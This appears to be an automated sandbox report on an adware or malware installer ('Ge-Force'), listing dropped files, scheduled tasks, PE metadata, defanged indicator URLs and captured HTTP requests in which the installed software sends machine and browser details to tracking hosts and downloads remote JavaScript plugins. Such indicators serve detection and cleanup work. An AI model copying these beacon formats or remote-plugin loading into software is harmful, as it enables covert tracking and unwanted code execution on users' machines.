%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\242.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\182.js (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\288[1].js (551 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\180.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\47.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\246.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\45.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\102.js (1 bytes)
%Program Files%\Ge-Force\background.html (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\21.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\39.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\35.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\28.js (536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\94.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\337[1].js (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\354.js (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\177.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\4.js (3312 bytes)
%Program Files%\Ge-Force\Ge-Force-buttonutil.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\262[1].js (25 bytes)
%Program Files%\Ge-Force\Ge-Force-codedownloader.exe (7547 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\InstallerUtils.dll (27704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins.json (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\64.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\345.js (579 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\273.js (905 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\78.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\37.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\329201 (141808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\14.js (784 bytes)
%Program Files%\Ge-Force\Ge-Force-bho.dll (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\nsisos.dll (5 bytes)
%Program Files%\Ge-Force\Ge-Force-bg.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\9.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\184.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\195.js (410 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB7.tmp (662466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\356[1].js (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\41.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\2.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\plugins[1].json (4153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\17.js (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode\extension.js (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\13.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\38.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\350[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\22.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\42.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\200.js (809 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\manifest[1].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\223.js (825 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\220.js (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\286.js (997 bytes)
%Program Files%\Ge-Force\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\67844 (31281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\91[1].js (86817 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\72.js (1552 bytes)
%WinDir%\Tasks\55b9f9b3-a933-4e78-9f2c-145eb2174f55-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\StdUtils.dll (14 bytes)
%Program Files%\Ge-Force\Ge-Force-buttonutil.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\183.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\253.js (737 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\263.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\ipgeoapi[1] (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\193[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\46.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\manifest.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\207.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\44.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\app_code[1].js (2977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\36.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\desktop.ini (67 bytes)
%Program Files%\Ge-Force\55b9f9b3-a933-4e78-9f2c-145eb2174f55-5.exe (7726 bytes)
%WinDir%\system.ini (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vbijkl.exe (741 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Khtmovq.exe (4404939 bytes)
%Program Files%\Common Files\Java\Java Update\jusched.exe (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0014C62D_Rar\%original file name%.exe (99596 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Kuoyj.tmp (419460 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\FacebookIsGod.dll (2426 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: Idzcf & co.
Product Name: Id-Eqhowiozunlmy
Product Version:
Legal Copyright: Copyright Vylorzwjeixeou
Legal Trademarks: Eqhowiozunlmy is a trademark of Kuoyj
Original Filename:
Internal Name:
File Version: 15.4.13.18
File Description: Teocxdjqh
Comments: comment on Khtmovq
Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 34108 | 34304 | 4.23004 | 63bb1ab888510a64d453326c977db871 |
.data | 40960 | 144 | 512 | 0.831186 | 28f29d4150b83e7faae233a71c5cab15 |
.rdata | 45056 | 9272 | 9728 | 3.95241 | f652035f54b3a74c89f7bb1cb907d4d2 |
.bss | 57344 | 297092 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 356352 | 4868 | 5120 | 3.6057 | 0d5c3df1017a50cd5a6baab82c884d87 |
.ndata | 364544 | 770048 | 8192 | 0 | 0829f71740aab1ab98b33eae21dee122 |
.rsrc | 1134592 | 69632 | 69120 | 5.50093 | 8fe4bd36b5bf2022d4edfda2dd0e3192 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://ipgeoapi.com/ | 23.21.123.184 |
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&app=69129&appver=0&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&xpiver=0_95&crxver=1_26_9&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=AirplaneNetworks&procstarttime=1421039403&procruntime=6&rnd=1421039409 | |
hxxp://cds.m9u9b7r5.hwcdn.net/monetization.gif?event=3&ibic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&campaign=001729&country=ca&app=69129&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1421039403&asw=0_1073750528_-2147483648_0&browser=ie,de&rnd=1421039403 | |
hxxp://cds.m9u9b7r5.hwcdn.net/plugin/apps/69129/manifest/1_35_12_18/ie6/manifest.xml?ver=9&rnd=7431 | |
hxxp://cds.m9u9b7r5.hwcdn.net/plugin/apps/69129/js/na/ie/app_code.js?ver=27&rnd=1521 | |
hxxp://cds.m9u9b7r5.hwcdn.net/plugin/apps/69129/plugins/na/ie/plugins.json?ver=23&rnd=5437 | |
hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/356.js?ver=1&rnd=41 | |
hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/193.js?ver=9&rnd=41 | |
hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/262.js?ver=2&rnd=41 | |
hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/288.js?ver=1&rnd=41 | |
hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/350.js?ver=1&rnd=41 | |
hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/337.js?ver=1&rnd=41 | |
hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/184.js?ver=11&rnd=41 | |
hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/91.js?ver=118&rnd=41 | |
hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=update&app=69129&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&ver=1_35_12_18&installtime=1421039403&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001729&subid=0&zdata=0&appver=27&bgver=1&pluginsver=23&curtime=1421039416&lifetime=13&oldappver=9&oldbgver=1&oldpluginsver=5&rnd=4509 | |
hxxp://s3-website-us-east-1.amazonaws.com/stats.gif?action=daily&app=69129&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&ver=1_35_12_18&installtime=1421039403&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001729&subid=0&zdata=0&appver=27&bgver=1&pluginsver=23&curtime=1421039418&lifetime=15&rnd=6909 | |
hxxp://cds.m9u9b7r5.hwcdn.net/plugin/apps/69129/manifest/1_35_12_18/ie6/manifest.xml?ver=27&rnd=8405 | |
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&app=69129&appver=27&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&xpiver=0_95&crxver=1_26_9&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=AirplaneNetworks&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1421039403&procruntime=22&rnd=1421039425 | |
hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&app=69129&appver=27&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&installtime=1421039403&lifetime=0&silent=1&crtnm=AirplaneNetworks&procstarttime=1421039403&procruntime=22&rnd=1421039425 | |
hxxp://cds.m9u9b7r5.hwcdn.net/monetization.gif?event=4&ibic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&campaign=001729&country=ca&app=69129&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1421039403&asw=0_1073750528_-2147483648_0&browser=ie,de&rnd=1421039403 | |
hxxp://logs.newstatsclientcloud.com/monetization.gif?event=4&ibic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&campaign=001729&country=ca&app=69129&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1421039403&asw=0_1073750528_-2147483648_0&browser=ie,de&rnd=1421039403 | 69.16.175.10 |
hxxp://js.newstatsclientcloud.com/plugin/apps/69129/manifest/1_35_12_18/ie6/manifest.xml?ver=9&rnd=7431 | 69.16.175.10 |
hxxp://js.newstatsdemosrv.com/plugins/mins/356.js?ver=1&rnd=41 | 69.16.175.10 |
hxxp://js.newstatsdemosrv.com/plugins/mins/350.js?ver=1&rnd=41 | 69.16.175.10 |
hxxp://js.newstatsdemosrv.com/plugins/mins/193.js?ver=9&rnd=41 | 69.16.175.10 |
hxxp://stats.newstatsclientcloud.com/installer.gif?action=started&app=69129&appver=0&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&xpiver=0_95&crxver=1_26_9&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=AirplaneNetworks&procstarttime=1421039403&procruntime=6&rnd=1421039409 | 54.231.32.196 |
hxxp://js.newstatsdemosrv.com/plugin/apps/69129/plugins/na/ie/plugins.json?ver=23&rnd=5437 | 69.16.175.10 |
hxxp://logs.newstatsclientcloud.com/monetization.gif?event=3&ibic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&campaign=001729&country=ca&app=69129&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1421039403&asw=0_1073750528_-2147483648_0&browser=ie,de&rnd=1421039403 | 69.16.175.10 |
hxxp://stats.newstatsclientcloud.com/apps.gif?action=install&app=69129&appver=27&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&installtime=1421039403&lifetime=0&silent=1&crtnm=AirplaneNetworks&procstarttime=1421039403&procruntime=22&rnd=1421039425 | 54.231.32.196 |
hxxp://js.newstatsdemosrv.com/plugins/mins/288.js?ver=1&rnd=41 | 69.16.175.10 |
hxxp://stats.newstatsclientcloud.com/stats.gif?action=daily&app=69129&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&ver=1_35_12_18&installtime=1421039403&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001729&subid=0&zdata=0&appver=27&bgver=1&pluginsver=23&curtime=1421039418&lifetime=15&rnd=6909 | 54.231.32.196 |
hxxp://js.newstatsdemosrv.com/plugins/mins/91.js?ver=118&rnd=41 | 69.16.175.10 |
hxxp://js.newstatsdemosrv.com/plugin/apps/69129/js/na/ie/app_code.js?ver=27&rnd=1521 | 69.16.175.10 |
hxxp://stats.newstatsclientcloud.com/installer.gif?action=finished&app=69129&appver=27&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&xpiver=0_95&crxver=1_26_9&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=AirplaneNetworks&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1421039403&procruntime=22&rnd=1421039425 | 54.231.32.196 |
hxxp://stats.newstatsclientcloud.com/apps.gif?action=update&app=69129&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&ver=1_35_12_18&installtime=1421039403&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001729&subid=0&zdata=0&appver=27&bgver=1&pluginsver=23&curtime=1421039416&lifetime=13&oldappver=9&oldbgver=1&oldpluginsver=5&rnd=4509 | 54.231.32.196 |
hxxp://js.newstatsdemosrv.com/plugins/mins/262.js?ver=2&rnd=41 | 69.16.175.10 |
hxxp://js.newstatsclientcloud.com/plugin/apps/69129/manifest/1_35_12_18/ie6/manifest.xml?ver=27&rnd=8405 | 69.16.175.10 |
hxxp://js.newstatsdemosrv.com/plugins/mins/337.js?ver=1&rnd=41 | 69.16.175.10 |
hxxp://js.newstatsdemosrv.com/plugins/mins/184.js?ver=11&rnd=41 | 69.16.175.10 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /installer.gif?action=started&app=69129&appver=0&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&xpiver=0_95&crxver=1_26_9&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=AirplaneNetworks&procstarttime=1421039403&procruntime=6&rnd=1421039409 HTTP/1.1
Host: stats.newstatsclientcloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: 5YWqA/hbsAT52j7+X+ANIhfz8LeZSwbzZennRSNr95qyRT5/GOxJxu15bYYT9dyR
x-amz-request-id: 0498DAA53AE4D7AA
Date: Mon, 12 Jan 2015 10:21:19 GMT
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Feb 2014 00:10:53 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /apps.gif?action=update&app=69129&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&ver=1_35_12_18&installtime=1421039403&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001729&subid=0&zdata=0&appver=27&bgver=1&pluginsver=23&curtime=1421039416&lifetime=13&oldappver=9&oldbgver=1&oldpluginsver=5&rnd=4509 HTTP/1.1
Accept: */*
Host: stats.newstatsclientcloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: Ua7e9bbvbbCCT1UU+bIiJuiUTlKYm66dUzVHP+y9fM8Qw6DgdOMqkLlvENZ3CpV4
x-amz-request-id: 8228922C1C267E83
Date: Mon, 12 Jan 2015 10:21:25 GMT
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Feb 2014 00:10:44 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /installer.gif?action=finished&app=69129&appver=27&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&xpiver=0_95&crxver=1_26_9&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=AirplaneNetworks&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1421039403&procruntime=22&rnd=1421039425 HTTP/1.1
Host: stats.newstatsclientcloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: A/zmK/7hgaaXBz9PonyEz79wBldwn4ioXtD1LKmI1eMLwSl2i1b3Rd+04pDGV3wy
x-amz-request-id: 3F5834F5D7454D55
Date: Mon, 12 Jan 2015 10:21:34 GMT
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Feb 2014 00:10:53 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /apps.gif?action=install&app=69129&appver=27&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&installtime=1421039403&lifetime=0&silent=1&crtnm=AirplaneNetworks&procstarttime=1421039403&procruntime=22&rnd=1421039425 HTTP/1.1
Host: stats.newstatsclientcloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: A3lVDGbw8R9O/TJq2nlst+TkRFytz5dj55QfSuffwiB5lh79oRi5t+UHQIFNIM9B
x-amz-request-id: 3DE7DD4364A2825D
Date: Mon, 12 Jan 2015 10:21:34 GMT
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Feb 2014 00:10:44 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;..
GET /monetization.gif?event=4&ibic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&campaign=001729&country=ca&app=69129&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1421039403&asw=0_1073750528_-2147483648_0&browser=ie,de&rnd=1421039403 HTTP/1.1
Host: logs.newstatsclientcloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:33 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1421058093.dop006.ny2.t,1421058093.cds053.ny2.c
GIF89a.............,...........D..;..
GET / HTTP/1.1
Host: ipgeoapi.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:17 GMT
Connection: keep-alive
Content-Type: application/json;charset=utf-8
